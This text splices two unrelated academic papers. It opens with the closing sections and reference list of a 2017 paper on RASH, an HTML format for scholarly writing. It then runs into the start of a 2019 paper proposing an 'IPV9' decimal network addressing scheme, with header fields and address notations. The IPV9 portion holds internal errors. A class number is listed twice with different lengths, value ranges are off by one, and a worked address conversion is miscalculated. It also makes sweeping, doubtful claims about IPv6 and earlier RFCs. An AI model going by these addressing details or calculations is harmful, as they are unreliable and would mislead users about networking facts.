presented the language and the validation/visualisation/conversion/extraction/editing tools developed so far. The goal of the paper was also to investigate the applicability and the potentialities of RASH, though the evaluation of its adoption in two SAVE-SD workshops. To the best of our knowledge, this is the first empirical evaluation on the adoption of HTML-based languages for writing scientific papers. The experiments proved that RASH can be successfully used for workshops and conferences, with a good acceptance by the authors and a smooth integration in the existing publishing process. As immediate future developments, we plan to develop tools for automating the process of semantic enrichment of RASH documents. For instance, we are currently working on the automatic identification of section rhetorics and citation functions so as to describe them according to two SPAR Ontologies (Peroni, 2014a), i.e., the Document Component Ontology (DoCO) (http://purl.org/spar/doco) and the Citation Typing Ontology (CiTO) (http://purl.org/spar/cito) respectively. Peroni et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.132 30/35 https://peerj.com http://osde.openlinksw.com/ http://purl.org/spar/doco http://purl.org/spar/cito http://dx.doi.org/10.7717/peerj-cs.132 We intend to further develop the RASH framework. In first instance, we are working on more sophisticated authoring tools and converters. For instance, we are currently developing additional XSLT documents in order to convert RASH documents into several different LaTeX formats for scholarly communications—such as IEEE conference proceedings and IOS Press—as well as into EPUB for easing its (offline) portability in mobile devices, which is something that would guarantee a better archival and accessibility of the whole document including its figures, CSS files, and JS scripts. We are also experimenting techniques for automatically generating accessible graphs from data contained in a referenced CSV file. Some results of this experimentation are already discussed in Di Mirri et al. (2017). ACKNOWLEDGEMENTS We would like to thank Sarven Capadisli (http://csarven.ca/) for our inspiring discussions on the topic, all the authors and the reviewers of the accepted papers of the SAVE-SD 2015 (http://cs.unibo.it/save-sd/2015/accepted-papers.html) and the SAVE-SD 2016 (http: //cs.unibo.it/save-sd/2016/accepted-papers.html) workshops for having provided us useful suggestions and insights for improving RASH and the related tools, as well as all the other early adopters of RASH. We would also like to thank the other two organisers of the past two edition of SAVE-SD, i.e., Jun Zhao (https://sites.google.com/site/junzhaohome/) and Alejandra Gonzalez-Beltran (http://www.oerc.ox.ac.uk/people/alejandra) for supporting us in the adoption of RASH as possible HTML submission format. In addition, we are particularly grateful to all the GitHub users that suggested and introduced new features to RASH and developed the tools included in its Framework: Alberto Nicoletti (https: //twitter.com/illbexyz), Vincenzo Rubano (https://twitter.com/titengodocchio), Mike Smith (https://sideshowbarker.net/), Gianmarco Spinaci (https://twitter.com/spino9330), Ruben Verborgh (http://ruben.verborgh.org). ADDITIONAL INFORMATION AND DECLARATIONS Funding The authors received no funding for this work. Competing Interests Silvio Peroni is an Academic Editor for PeerJ Computer Science. Author Contributions • Silvio Peroni conceived and designed the experiments, performed the experiments, contributed reagents/materials/analysis tools, wrote the paper, prepared figures and/or tables, performed the computation work. • Francesco Osborne conceived and designed the experiments, performed the experiments, analyzed the data, contributed reagents/materials/analysis tools, wrote the paper, prepared figures and/or tables, performed the computation work. Peroni et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.132 31/35 https://peerj.com http://csarven.ca/ http://cs.unibo.it/save-sd/2015/accepted-papers.html http://cs.unibo.it/save-sd/2016/accepted-papers.html http://cs.unibo.it/save-sd/2016/accepted-papers.html https://sites.google.com/site/junzhaohome/ http://www.oerc.ox.ac.uk/people/alejandra https://twitter.com/illbexyz https://twitter.com/illbexyz https://twitter.com/titengodocchio https://sideshowbarker.net/ https://twitter.com/spino9330 http://ruben.verborgh.org http://dx.doi.org/10.7717/peerj-cs.132 • Angelo Di Iorio wrote the paper, prepared figures and/or tables, reviewed drafts of the paper. • Andrea Giovanni Nuzzolese and Francesco Poggi contributed reagents/materials/analysis tools, wrote the paper, prepared figures and/or tables, performed the computation work. • Fabio Vitali and Enrico Motta reviewed drafts of the paper. Data Availability The following information was supplied regarding data availability: Osborne, Francesco; Peroni, Silvio (2017): Outcomes of SAVE-SD 2015 and 2016 questionnaires on RASH and analysis of RDF annotations in the RASH papers. figshare. https://dx.doi.org/10.6084/m9.figshare.3980463.v5. Supplemental Information Supplemental information for this article can be found online at http://dx.doi.org/10.7717/ peerj-cs.132#supplemental-information. REFERENCES Alexander C. 1979. The timeless way of building. Oxford: Oxford University Press. Atkins Jr T, Etemad EJ, Rivoal F. 2017. CSS Snapshot 2017. W3C Working Group Note 31 January 2017. World Wide Web Consortium. Available at https://www.w3.org/ TR/css3-roadmap/ . Berjon R, Ballesteros S. 2015. What is scholarly HTML? Available at http://scholarly. vernacular.io/ . Bourne PE, Clark T, Dale R, De Waard A, Herman I, Hovy EH, Shotton D. 2011. FORCE11 White Paper: improving The Future of Research Communications and e-Scholarship. White Paper, 28 October 2011. FORCE11. Available at https://www. force11.org/white_paper. Brooke J. 1996. SUS-A quick and dirty usability scale. Usability Evaluation in Industry 189(194):4–7. Capadisli S, Guy A, Verborgh R, Lange C, Auer S, Berners-Lee T. 2017. Decentralised authoring, annotations and notifications for a read-write web with dokieli. In: Proceedings of the 17th international conference on web engineering. Cham: Springer, 469–481 DOI 10.1007/978-3-319-60131-1_33. Capadisli S, Riedl R, Auer S. 2015. Enabling accessible knowledge. In: Proceedings of the 2015 International conference for e-democracy and open government (CeDEM 2015). Krems: Universität Krems. Available at http://csarven.ca/enabling-accessible- knowledge. Carlisle D, Ion P, Miner R. 2014. Mathematical Markup Language (MathML) Version 3.0. 2nd edition. W3C Recommendation 10 April 2014. World Wide Web Consor- tium. Available at http://www.w3.org/TR/MathML3/ . Clark J, Makoto M. 2001. RELAX NG specification. Committee specification, 3 Decem- ber 2001. OASIS. Available at http://relaxng.org/spec-20011203.html. Peroni et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.132 32/35 https://peerj.com https://dx.doi.org/10.6084/m9.figshare.3980463.v5 http://dx.doi.org/10.7717/peerj-cs.132#supplemental-information http://dx.doi.org/10.7717/peerj-cs.132#supplemental-information https://www.w3.org/TR/css3-roadmap/ https://www.w3.org/TR/css3-roadmap/ http://scholarly.vernacular.io/ http://scholarly.vernacular.io/ https://www.force11.org/white_paper https://www.force11.org/white_paper http://dx.doi.org/10.1007/978-3-319-60131-1_33 http://csarven.ca/enabling-accessible-knowledge http://csarven.ca/enabling-accessible-knowledge http://www.w3.org/TR/MathML3/ http://relaxng.org/spec-20011203.html http://dx.doi.org/10.7717/peerj-cs.132 Constantin A, Peroni S, Pettifer S, Shotton D, Vitali F. 2016. The Document Compo- nent Ontology (DoCO). Semantic Web 7(2):167–181 DOI 10.3233/SW-150177. Cyganiak R, Wood D, Lanthaler M. 2014. RDF 1.1 concepts and abstract syntax. W3C recommendation 25 February 2014. World Wide Web Consortium. Available at http://www.w3.org/TR/rdf11-concepts/ . Di Iorio A, González Beltrán A, Osborne F, Peroni S, Poggi F, Vitali F. 2016. It ROCS!: the RASH online conversion service. In: WWW (Companion Volume) 2016. New York: ACM, 25–26 DOI 10.1145/2872518.2889408. Di Iorio A, Peroni S, Poggi F, Vitali F. 2012. A first approach to the automatic recognition of structural patterns in XML documents. In: Proceedings of the 2012 ACM symposium on document engineering. New York: ACM, 85–94 DOI 10.1145/2361354.2361374. Di Iorio A, Peroni S, Poggi F, Vitali F. 2014. Dealing with structural patterns of XML documents. Journal of the American Society for Information Science and Technology 65(9):1884–1900 DOI 10.1002/asi.23088. Di Iorio A, Peroni S, Poggi F, Vitali F, Shotton D. 2013. Recognising document compo- nents in XML-based academic articles. In: Proceedings of the 2013 ACM symposium on document engineering. New York: ACM, 181–184 DOI 10.1145/2494266.2494319. Di Mirri S, Peroni S, Rubano V, Salomoni P, Vitali F. 2017. Towards accessible graphs in HTML-based scientific articles. In: Proceedings of the 2nd international workshop on accessible devices and services (ADS 2017). IEEE DOI 10.1109/CCNC.2017.7983287. Diggs J, Craig J, McCarron S, Cooper M. 2015. Accessible rich internet applications (WAI-ARIA) 1.1. W3C Candidate Recommendation 27 October 2016. World Wide Web Consortium. Available at http://www.w3.org/TR/wai-aria-1.1/ . Gamma E, Helm R, Johnson R, Vlissides J. 1994. Patterns: elements of reusable object- oriented software. New York: Addison-Wesley. Gandon F, Schreiber G. 2014. RDF 1.1 XML syntax. W3C recommendation 25 February 2014. World Wide Web Consortium. Available at https://www.w3.org/TR/rdf- syntax-grammar/ . Gao S, Sperberg-McQueen CM, Thompson HS. 2012. W3C XML schema definition language (XSD) 1.1 Part 1: structures. W3C recommendation, 5 April 2012. World Wide Web Consortium. Available at https://www.w3.org/TR/xmlschema11-1/ . Garrish M, Siegman T, Gylling M, McCarron S. 2016. Digital publishing WAI-ARIA module 1.0. W3C candidate recommendation 15 December 2016. World Wide Web Consortium. Available at https://www.w3.org/TR/dpub-aria-1.0/ . Hickson I, Berjon R, Faulkner S, Leithead T, Doyle Navara E, O’Connor E, Pfeiffer S. 2014. HTML5: a vocabulary and associated APIs for HTML and XHTML. W3C recommendation 28 October 2014. World Wide Web Consortium. Available at http://www.w3.org/TR/html5/ . JTC1/SC34 WG 4. ISO/IEC 29500-1:2011 - Information technology - Document description and processing languages - Office Open XML File Formats - Part 1: Fundamentals and Markup Language Reference. 2011. Geneva: International Peroni et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.132 33/35 https://peerj.com http://dx.doi.org/10.3233/SW-150177 http://www.w3.org/TR/rdf11-concepts/ http://dx.doi.org/10.1145/2872518.2889408 http://dx.doi.org/10.1145/2361354.2361374 http://dx.doi.org/10.1002/asi.23088 http://dx.doi.org/10.1145/2494266.2494319 http://dx.doi.org/10.1109/CCNC.2017.7983287 http://www.w3.org/TR/wai-aria-1.1/ https://www.w3.org/TR/rdf-syntax-grammar/ https://www.w3.org/TR/rdf-syntax-grammar/ https://www.w3.org/TR/xmlschema11-1/ https://www.w3.org/TR/dpub-aria-1.0/ http://www.w3.org/TR/html5/ http://dx.doi.org/10.7717/peerj-cs.132 Organization for Standardization. Available at http://www.iso.org/iso/iso_catalogue/ catalogue_tc/catalogue_detail.htm?csnumber=59575. JTC1/SC34 WG 6. ISO/IEC 26300:2006 - Information technology - Open Document Format for Office Applications (OpenDocument) v1.0. 2006. Geneva: International Organization for Standardization. Available at http://www.iso.org/iso/iso_catalogue/ catalogue_tc/catalogue_detail.htm?csnumber=43485. Kay M. 2007. XSL transformations (XSLT) version 2.0. W3C recommendation 23 January 2007. World Wide Web Consortium. Available at http://www.w3.org/TR/ xslt20/ . Lin TTY, Beales G. 2015. ScholarlyMarkdown Syntax Guide. Guide, 31 January 2015. Available at http://scholarlymarkdown.com/Scholarly-Markdown-Guide.html. National Information Standards Organization. 2012. JATS: journal article tag suite. American national Standard No. ANSI/NISO Z39.96-2012, 9 August 2012. Available at http://www.niso.org/apps/group_public/download.php/10591/z39.96-2012.pdf . Osborne F, Peroni S. 2016. Outcomes of SAVE-SD 2015 and 2016 question- naires on RASH and analysis of RDF annotations in RASH papers. Figshare. DOI 10.6084/m9.figshare.3980463. Peroni S. 2014a. The semantic publishing and referencing ontologies. In: Semantic web technologies and legal scholarly publishing. Cham: Springer, 121–193. Peroni S. 2014b. Semantic web technologies and legal scholarly publishing. In: Law, governance and technology series 15. Cham: Springer. Peroni S. 2017. RASH framework 0.6.1. Zenodo DOI 10.5281/zenodo.815603. Peroni S, Shotton D. 2012. FaBiO and CiTO: ontologies for describing bibliographic re- sources and citations. Web Semantics 17:33–43 DOI 10.1016/j.websem.2012.08.001. Pettifer S, McDermott P, Marsh J, Thorne D, Villeger A, Attwood TK. 2011. Ceci n’est pas un hamburger: modelling and representing the scholarly article. Learned Publishing 24(3):207–220 DOI 10.1087/20110309. Prud’hommeaux E, Carothers G. 2014. Turtle—Terse RDF triple language. W3C recommendation 25 February 2014. World Wide Web Consortium. Available at http://www.w3.org/TR/turtle/ . Raggett D, Le Hors A, Jacobs I. 1999. HTML 4.01 specification. W3C recommendation, 24 December 1999. World Wide Web Consortium. Available at http://www.w3.org/ TR/html401/ . Shotton D, Portwin K, Klyne G, Miles A. 2009. Adventures in semantic publishing: exemplar semantic enhancements of a research article. PLOS Computational Biology 5(4):e1000361 DOI 10.1371/journal.pcbi.1000361. Spinaci G, Peroni S, Di Iorio A, Poggi F, Vitali F. 2017. The RASH Javascript editor (RAJE)—a wordprocessor for writing Web-first scholarly articles. In: Proceeding of the 17th ACM symposium on document engineering (DocEng 2017). New York: ACM, 85–94 DOI 10.1145/3103010.3103018. Sporny M. 2015. HTML+RDFa 1.1: support for RDFa in HTML4 and HTML5. W3C recommendation 17 March 2015. World Wide Web Consortium. Available at http: //www.w3.org/TR/rdfa-in-html/ . Peroni et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.132 34/35 https://peerj.com http://www.iso.org/iso/iso_catalogue/catalogue_tc/catalogue_detail.htm?csnumber=59575 http://www.iso.org/iso/iso_catalogue/catalogue_tc/catalogue_detail.htm?csnumber=59575 http://www.iso.org/iso/iso_catalogue/catalogue_tc/catalogue_detail.htm?csnumber=43485 http://www.iso.org/iso/iso_catalogue/catalogue_tc/catalogue_detail.htm?csnumber=43485 http://www.w3.org/TR/xslt20/ http://www.w3.org/TR/xslt20/ http://scholarlymarkdown.com/Scholarly-Markdown-Guide.html http://www.niso.org/apps/group_public/download.php/10591/z39.96-2012.pdf http://dx.doi.org/10.6084/m9.figshare.3980463 http://dx.doi.org/10.5281/zenodo.815603 http://dx.doi.org/10.1016/j.websem.2012.08.001 http://dx.doi.org/10.1087/20110309 http://www.w3.org/TR/turtle/ http://www.w3.org/TR/html401/ http://www.w3.org/TR/html401/ http://dx.doi.org/10.1371/journal.pcbi.1000361 http://dx.doi.org/10.1145/3103010.3103018 http://www.w3.org/TR/rdfa-in-html/ http://www.w3.org/TR/rdfa-in-html/ http://dx.doi.org/10.7717/peerj-cs.132 Sporny M, Kellogg G, Lanthaler M. 2014. JSON-LD 1.0—a JSON-based serialization for linked data. W3C Recommendation 16 January 2014. World Wide Web Consortium. Available at https://www.w3.org/TR/json-ld/ . Walsh N. 2009. The DocBook Schema Version 5.0. OASIS Standard, 1 November 2009. Burlington: Organization for the Advancement of Structured Information Standards. Available at http://docs.oasis-open.org/docbook/specs/docbook-5.0-spec-os.html. Peroni et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.132 35/35 https://peerj.com https://www.w3.org/TR/json-ld/ http://docs.oasis-open.org/docbook/specs/docbook-5.0-spec-os.html http://dx.doi.org/10.7717/peerj-cs.132 work_rgrzanwrozbotp3dzhmj2rovzy ---- International Journal of Advanced Network, Monitoring and Controls Volume 04, No.01, 2019 29 Design and Research of New Network Address Coding Lai Yufeng 1. State and Provincial Joint Engineering Lab. of Advanced Network, Monitoring and Control, China 2. School of Computer Science and Engineering Xi'an Technological University Xi'an, China e-mail: 604612675@qq.com Xie Jianping 1. Chinese Decimal Network Working Group Shanghai, China 2. Shanghai Decimal System Network Information e-mail: 13386036170@189.cn Cheng Xiaowei 1. Chinese Decimal Network Working Group Shanghai, China 2. Shanghai Decimal System Network Information e-mail: xewei.cheng@em777.net Li Yuyu Shandong Radio, Television and Network Co., LTD. Tai 'an Branch e-mail: tagdjsb@126.com Abstract—To solve a series of problems caused by address space and information security of contemporary Internet, Chinese scientists have proposed a new generation of network architecture. Since the release of IPv4 RFC791 in 1981, it has become the first widely used Internet of things protocol due to its characteristics of easy implementation and good operability. It constitutes the basic protocol of current Internet technology. However, due to the defects in address classification, address resources are largely wasted. As the scale of the Internet continues to grow, especially the number of addresses used to surge, the address shortage has limited the Internet further development. IPv6 has solved the problem of insufficient IPv4 addresses to some extent, but it is not widely for more than 20 years used because it integrates the information of physical layer and application layer, which confuses the network layer and brings many security risks. Based on the study of IPv4 and IPv6, this paper proposes a new generation network architecture, which is designed from the aspects of addressing model, address writing, address prefix writing and address type. The address structure is compatible with IPv4 and IPv6, so that the previous design results can be retained, fundamentally solve the space address and information security issues, and provide a new solution for the next generation of Internet applications and research. Keywords-Network Architecture; The Network Address; IPV9; IPv4; IPv6 PREFACE Because IPv4 addresses are allocated on a first-come-first-served, on-demand basis, the distribution imbalance makes address allocation flawed. With the continuous development of the Internet (especially the explosive growth of the scale and the surge of address use), some inherent defects of IPv4 are gradually exposed, mainly focusing on address shortage. IPV4 does not provide encryption and authentication mechanisms to ensure the secure transmission of confidential data resources and other aspects. Although the use of NAT ("Network Address Translation"), CIDR ("Classless Inter-Domain Routing") and other technologies can alleviate the IPv4 DOI: 10.21307/ijanmc-2019-031 International Journal of Advanced Network, Monitoring and Controls Volume 04, No.01, 2019 30 crisis to some extent. But in fact, it has not fundamentally solved the problem. At the same time, it will bring new problems in cost, quality of service, security and other aspects, posing greater challenges. To solve the problem of insufficient IPv4 addresses, scientists proposed IPv6.However, due to the limitations of the technology era, there are many defects in the design of IPv6 address structure. Not satisfied with the 128-bit address length, the designers did not follow the principle of transparency between different protocol layers and added the physical layer address and the application layer in the design of IPv6 address segment (the protocol of the network layer), which led to a series of fatal problems. "IPv9" is an idea proposed in the early 1990s by the IETF (The Internet Engineering Task Force) in the June 1992 issue of RFC 1347 to address the deficiencies in Internet address domain names.In May 1995, IETF unilaterally abandoned its cooperation with ISO (International Organization for Standardization), disbanded TUBA, the institute for IPv9 research, and terminated its organized research and development activities for IPv9. However, no intellectual property rights and valuable technical data were formed in this research. Inspired by RFC 1347, Xie Jianping, a Chinese expert, formed the Chinese IPV9 research and development team with Shanghai general chemical technology research institute as the gathering center. The difference between uppercase and lowercase indicates that the IPV9 developed in China is not a technical version following the Internet. IP version 9 (IPV9) is a new version of the Internet protocol, also known as the decimal network, digital domain name. The decimal network technology protocol is developed independently by our country. The emergence of IPV9 fundamentally solves the problems of insufficient address and network security. I. NEW NETWORK ADDRESS IPV9 A. Network Address Internet addresses are assigned by ICANN（the Internet Corporation for Assigned Names and Numbers ） .The association appoints three local organizations for the assignment of addresses: INTERNIC for North America, RIPENCC for Europe and APNIC for the Asia Pacific region. The purpose of uniform allocation is to ensure that the network address has global uniqueness, and the host address is assigned by the system administrator of each network. Therefore, the uniqueness of the network address and the host address within the network ensures the uniqueness of the IP address. B. IPV9 IPV9 decimal network/digital domain name system (IPV9).Based on the study of IPv4 and IPv6, the following changes are proposed. IPV9 expands the address length to 2048 bits, reduces the network overhead by means of indefinite length and non-location, and guarantees the network security. This article defines the IPV9 address architecture, including a detailed description of the currently defined IPV9 address format. C. IPV9 header format The format design of IPV9 system header is shown in table 1. International Journal of Advanced Network, Monitoring and Controls Volume 04, No.01, 2019 31 TABLE I. IPV9 HEADER FORMAT Version number communication stream type stream label Address length Priority class traffic Address the authentication Absolute traffic Payload length Next head hop limit source address ( 16-2048 bit ) Destination address ( 16-2048 bit ) time Authentication code The design of table 1 is explained below. 1) Version: 4-bit length, Internet protocol version number. For IPV9, this field must be 9. 2) Category: 8 bits in length. 3 bits high is used to specify the address length, the value is 0 ~ 7, is the power of 2, the address length is 1Byte ~ 128Byte; the default value is 256 bits. Among them, 0 is 16 bits, 1 is 32 bits, 2 is 64 bits, 3 is 128 bits, 4 is 256 bits, 5 is 512 bits, 6 is 1024 bits, 7 is 2048 bits. The last five bits specify the communication class and authentication for the source and destination addresses.0 to 15 is the priority value, where 0 to 5 is used to specify the priority class of the traffic; 6 to 7 are used to specify the communication method of authentication before communication. The address of packet sending is used for traffic control and whether authentication of source address and destination address is required.8 to 14 are used to specify absolute traffic that will not fall back when congestion is encountered; 15 for virtual circuits; 16 and 17 respectively assign audio and video, called absolute value, to ensure the uninterrupted transmission of audio and video. Other values are reserved for later use. 3) Flow label: With a length of 20 bits, it is used to identify packages belonging to the same business flow. 4) Net load length: The length is 16 bits, including the net load byte length, that is, the number of bytes contained in the packet after IPV9 header. 5) Next header: The length is 8 bits. This field indicates the protocol type in the field following the IPV9 header. 6) Hop limit: The length is 8 bits, and this field will be reduced by one every time a node forwards a packet. 7) Source address: 8-bit bit ~ 2048-bit bit, specifying IPV9 packet sender address. Use of variable length and location method. 8) Destination address: The length is 8 bit ~ 2048 bit, and the destination address of IPV9 packet is specified. Use of variable length and location method. 9) Time: Used to control the lifetime of the address in the header. 10) Authentication code: It is used to identify the authenticity of the address in the header. II. IPV9 ADDRESS SPACE A. Type of address IPV9 addresses specify 256-bit identifiers for interfaces and interface groups. There are three types of addresses: 1) Unicast. A single interface has an identifier. A packet sent to a unicast address is passed to an interface identified by that address. 2) Arbitrary cast. Typically, a set of interfaces belonging to different nodes has an identifier. A packet sent to an arbitrary cast address is passed to an interface identified by that address that is the closest measured by the routing protocol distance. International Journal of Advanced Network, Monitoring and Controls Volume 04, No.01, 2019 32 3) Multicast. Typically, a set of interfaces belonging to different nodes has an identifier. A packet sent to a multicast address is passed to all interfaces at that address. There are no broadcast addresses in IPV9, and its functionality is being replaced by multicast addresses. In this article, fields within the address are given a specified name, such as "user." When the name is followed by an identifier (such as "user ID"), it is used to represent the content of the name field. When a name is used with a prefix (such as "user prefix"), it represents all addresses up to and including this field. In IPV9, any fields that are all "0" and all "1" are valid values unless specifically excluded. In particular, the prefix can contain a "0" value field or end with a "0". B. Addressing model All types of IPV9 addresses are assigned directly to the interface, not to the node.IPV9 unicast addresses belong to a single interface. Because each interface belongs to a single node, a node of multiple interfaces, any of its unicast addresses can be used as the identifier for that node. All interfaces need at least one link local unicast address. A single interface can specify multiple IPV9 addresses (unicast, arbitrary cast, multicast) or ranges of any type. Unicast addresses with greater link range are not required for interfaces that go from non-neighbor or to non-neighbor and are not the origin or destination of any IPV9 packets. This is sometimes used for point-to-point interfaces. There is one exception to this addressing model: Handle the case of multiple physical interface implementations. If the state that emerges in the Internet layer is an interface, a unicast address or a group of unicast addresses can be assigned to multiple physical interfaces. This is useful for load-sharing across multiple physical interfaces. Current IPV9 extends the Ipv4 model, with a subset prefix associated with a link. Multiple subset prefixes can be specified to the same link. III. TEXT REPRESENTATIONS OF IPV9 ADDRESSES This article has developed a way to represent IPV9 addresses, including ―Brackets decimal‖ representation, "Curly braces" representation, and "Parentheses" representation. A. Brackets decimal The bracket decimal can be expressed in the following two ways: The first method： 2048 bits are represented by "[]".The 2048 bits in "[]" are expressed in decimal and can be written in indefinite length. And you can omit the "[]" when writing in the browser. The second method ：The 256-bit IPV9 address representation is in the form of "y[y] [y] [y] [y] [y] [y]". Each y represents a 32-bit portion of the address and is represented in decimal.232 =4294967296, so each ―y‖ is a decimal number of ten digits. Each digit that is distinct from the decimal system ranges from 0 to 9.For example, the range of the first digit from the left is 0 to 4, so that there will be no overflow. For example: 0000170170[0000062062[0000000000[000000000 0[0000000000[0000000000[0000210210[0000422422 In address representation, multiple consecutive zeros to the left of each decimal number can be omitted, but a decimal number that is completely zero needs to be represented by a zero. For example, the above address can be written as: 170170[62062[0[0[0[0[210210[422422 To simplify the representation of addresses, successive all-zero fields in the address can be replaced by a pair of square brackets "[X]" (X is the number of International Journal of Advanced Network, Monitoring and Controls Volume 04, No.01, 2019 33 segments in the all-zero field).For example, the above address can be abbreviated as: 170170[62062[4][210210[422422 Another example: 0[0[0[0[0[0[0[1 can be abbreviated as [7]1 0[0[0[0[0[0[0[0 can be abbreviated as [8] B. Decimal braces This method divides the 256-bit address into four 64-bit decimal Numbers represented by curly braces separating them. The representation is in the form of "Z}Z}Z}Z", where each ―Z‖ represents a 64-bit portion of the address and is represented in decimal. It's exactly the same as ―Y‖, and it's compatible with ―Y‖. You can mix the two. This greatly facilitates the current compatibility of these Ipv4 addresses in IPV9.Such as: z}z}z}z; z}z}y]y]y]y; z}z}y]y]y]d.d.d.d; z}z}z}y]d.d.d.d; z}z}z}y]J.J.J.J; In particular, the last address format is the most useful. Such as: 0}0}0}0]193.193.193.193 You can write it like this: {3}0]193.193.193.193 Finally, it should be noted that in symbolic representation, the brackets and Curly braces are used without distinction. That is, "{" and"} ", "[" and"] "are not dissimilar, since this will not cause any side effects and is more convenient for users. C. Parentheses representation Since IPV9 has an address length of 256 bits, whether you use four or eight segments, there are still many bits in each segment. For example, with an 8-segment representation, each segment still has 32 bits. This is what happens in a paragraph: ……]00000000000000000000000000110100]… … ……]01011111111111111111111111111111]… … Such a situation is not only cumbersome input, and it is easy to lose less or more, the user is not conducive to the number of dazzling.For convenience, the parenthesis representation -- (K/L) is introduced.Where "K" means 0 or 1 and "L" means the number of 0 or 1.In this way, the above two examples can be abbreviated as: ……]（0/26）110100]…… ……]010（1/29）]…… D. Text representation of address prefixes The IPV9 address scheme is similar to the super netting and CIDR schemes of Ipv4 in that the address prefix is used to represent the network hierarchy. On the representation of IPV9 address prefix, a representation similar to CIDR is adopted, which is as follows: IPV9 address/address prefixes length. Where, IPV9 address is written in IPV9 address representation. The address prefix length is the length of consecutive bits that form the address prefix from the left. At this point, it is important to note that IPV9 addresses use decimal Numbers, but prefix length refers to binary. Therefore, prefixes must be calculated carefully. In binary Numbers is not intuitive, after consideration, it is considered that the IPV9 address prefix can be converted to hexadecimal is easier to understand, but the IPV9 address is still expressed in decimal Numbers. For example, the 200-bit address prefixes 1314[0[0[0[224[169[0 can be expressed as: 1314[0[0[0[343[150[0[0/200 Or 1314[3]224[169[0[0/200 Or 1314[0[0[0[224[169[2]/200 Or 1314[3]224[169[2]/200 International Journal of Advanced Network, Monitoring and Controls Volume 04, No.01, 2019 34 Note that in the representation of the address prefix, the IPV9 address portion must be legal. The IPV9 address to the left of the slash ―/‖ must be restored to the correct address. In this address prefix, you can see that the address prefix is 200 in length. So, the prefix is really just the first 6 bits of the entire address plus the first 8 bits of paragraph 7 (32 times 6+8=200).So the key is in the seventh paragraph of the address. This paragraph is expressed in hexadecimal as:―********‖. Because in hexadecimal, one digit is 4 bit, the prefix includes only the first two ―*‖. Knowing this, you know that the value of this segment is 00000000 (hex) ~00FFFFFF (hex), or 0~16777215 in decimal. (Or this paragraph may be expressed in binary as: ―**** **** **** **** **** **** **** ****‖. Because in binary, one bit is one bit, so the prefix includes the first eight ―*‖, the range of values in this section is0000 0000 0000 0000 0000 0000~0000 0000 0000 1111 1111 1111 1111 1111That is, decimal 0~16777215.) The IPV9 address portion can be generated by a pure address prefix by appending a 0 to its right, or it can be a real IPV9 address that contains the address prefix. For example, the address prefix in the above example can also be expressed as: 1314[3]224[169[a[b/200 ―a‖ is any decimal number between 0 and 16777215, and ―b‖ is any decimal number between 0 and 4294967296. IV. IPV9 ADDRESS TYPE 1) Pure IPV9 address The form of this address is Y[Y[Y[Y[Y[Y[Y[Y Each Y represents a decimal integer from 0 to 232 =4294967296 2) IPV9 addresses compatible with Ipv4 The form of the address is Y[Y[Y[Y[Y[Y[Y[D.D.D.D Each Y represents a decimal integer from 0 to 232 =4294967296. D represents a decimal integer between 0 and 255 from the original Ipv4. 3) IPV9 addresses compatible with Ipv6 The form of this address is: Y[Y[Y[Y[X:X:X:X:X:X:X:X Each Y represents a decimal integer from 0 to 232=4294967296.The X represents a hexadecimal number that originally Ipv6 ranged from 0000 to FFFF. 4) Special compatibility address In order to upgrade from Ipv4 and Ipv6 to IPV9 smoothly, some compatible addresses are designed. Among them, some Ipv6 addresses are designed to be compatible with Ipv4 addresses. To smooth the transition to IPV9 addresses, prefix these addresses appropriately. In order to make their representation more intuitive and avoid errors caused by negligence in writing, the abbreviation method is introduced: y[y[y[y[x:x:x:x:x:x:d.d.d.d Where, each ―y‖ represents the address as 32 bits, represented in decimal. Each ―x‖represents the original Ipv6 address of 16 bits, in hexadecimal. Each ―d‖ represents the original Ipv4 address of 8 bits, expressed in decimal.Such as: 0[0[0[0[14714747[1199933[223556889[147258369 Can be written as: 0[0[0[0[E0:877B:12:4F3D:D53:3519:3.198.252.1 Or: [4] E0:877B:12:4F3D:D53:3519:3.198.252.1 Such as: 0[0[0[0[0[0[0[562159487 Can be written as:[4]::33.129.223.127 (Analysis: ":" is IPv6 address compression form of the representation, multiple 0 blocks of a single continuous sequence by the double colon symbol "::".Decimal 562159487 is expressed as 33.129.223.127 in decimal.) International Journal of Advanced Network, Monitoring and Controls Volume 04, No.01, 2019 35 5) [] full decimal address In order to facilitate the logistics code and decimal address application. Category number 5 is recommended. In the power of 10 to the power of 512, the method of fixed length and non-positioning is adopted according to the application needs. 6) IPV9 address of transition period IPV9 can be compatible with IPv4 and IPv6 technical protocols for the Internet, but IPv4 and IPv6 technical protocols cannot be anti-compatible with IPV9.The concept of compatibility is parallel coexistence, gradual and moderate transfer of applications and data services, rather than direct replacement or replacement of existing protocols. In order to solve the problem of IPv4 smooth transition to IPV9, considering the existing Internet has invested a lot of money so far, we specially designed IPV9's transition address, and took out a segment 232to allocate IPv4.Small changes can be made to the current system, where IPV9 has a section of J.J.J.J. where each J represents a decimal number from 0 to 28 which is 0 to 255.Where the previous [7] can be omitted in the middle of the local address, that is, local users (or designated users) can use J.J.J.J. to directly use and the original Ipv4 D.D.D.D. distinction.At the same time, this part of the user in order to smooth the transition to full decimal can be allocated at the same time decimal. In order to improve the software and hardware in the future without the need to reallocate addresses, such as [7]5211314 can be written as [7]3.48.155.175 in the region in an IP network can be directly written with 3.48.155.175, so that the original terminal can be used.There should be new records in the IPV9 DNS records for compatibility between the original user and the current user.The interim IPV9 address system can be modified to the original IPv4 system.Meanwhile, the Ipv4 header is used, but the version number is 9 to distinguish the original IPv4.However, the original terminal equipment may be used by user terminals in the territory. When the address length is 16 bits when the class number is 0, the IPv4 physical address is discarded and the IPv4 host 16-bit address is used. The representation is decimal 65535 or dot decimal 0-255.0-255 as in hexadecimal FF.FF. When the class number is 1, the address length is 32 bits, represented by decimal 0-4294967295 and the corresponding character length or dot decimal 0-255.0-255.0-255.0- 255.0-255 as in hexadecimal FF.FF.FF.FF When the class number is 2, the address length is 64 bits, represented by decimal 10 or the corresponding character length. When the class number is 3, the address length is 128 bits, represented by decimal or the corresponding character length. When the class number is 4, the address length is 256 bits, represented by decimal or the corresponding character length. When the class number is 4, the address length is 512 bits, denoted by decimal or the corresponding character length. When the class number is 5, the address length is 1024 bits, denoted by decimal or the corresponding character length. When the category number is 6, the address length is 2048 bits, represented by decimal or the 